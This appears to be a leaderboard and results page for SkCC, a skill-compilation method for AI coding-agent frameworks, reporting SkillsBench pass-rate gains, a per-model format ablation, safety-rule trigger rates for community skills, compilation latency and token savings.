Leaderboard

SkillsBench (89 real-world tasks) across four mainstream agent frameworks. Pass@1 with reward ≥ 0.5.

RankFrameworkModelBaseline Pass%SkCC Pass%Δ Pass RateMean Reward Δp-valueCohen's d
#1Kimi CLIkimi-k2.535.1%48.7%+13.5pp+0.1420.0063**0.33
#2Claude Codeclaude-opus-4-621.1%33.3%+12.2pp+0.2740.0103*0.60
#3Codex CLIgpt-5.3-codex38.5%42.3%+3.8pp+0.067
#4Gemini CLIgemini-2.5-pro22.2%22.2%0.0pp+0.019

🔬 Ablation: Format Specificity

Model-Dependent
Same Kimi-compiled format: Kimi +13.5pp (p=0.0063), GLM-5 neutral (p=0.857), DeepSeek slightly negative (p=0.256). Proves per-model emission is necessary.

🛡️ Anti-Skill Injection

94.8%
221 of 233 community skills triggered at least one safety rule. HTTP safety: 91.4%, Loop safety: 44.6%, DB safety: 33.5%.

⚡ Compilation Latency

8.93ms
Average across 225 skills. Simple: 8.54ms, Medium: 8.58ms, Complex: 9.13ms. Max: 22.89ms.

💰 Token Efficiency

10–46%
Runtime token savings across frameworks. Claude: 23% fewer tokens, Codex: 43% faster execution, Gemini: 23% time reduction.

Ablation Study: Format Specificity

ModelFrameworkBackendBaseline → SkCC Pass%p-valueCohen's dVerdict
kimi-k2.5Kimi CLIKimi35.1% → 48.7%0.0063**+0.33SkCC > Baseline
glm-5.1OpenHandsKimi48.9% → 50.0%0.857−0.03SkCC ≈ Baseline
deepseek-v4-flashOpenHandsKimi72.7% → 73.9%0.2561−0.14Baseline > SkCC

The same Kimi-compiled format produces divergent effects across models, confirming that compilation gains are model-specific — justifying SkCC's multi-backend architecture.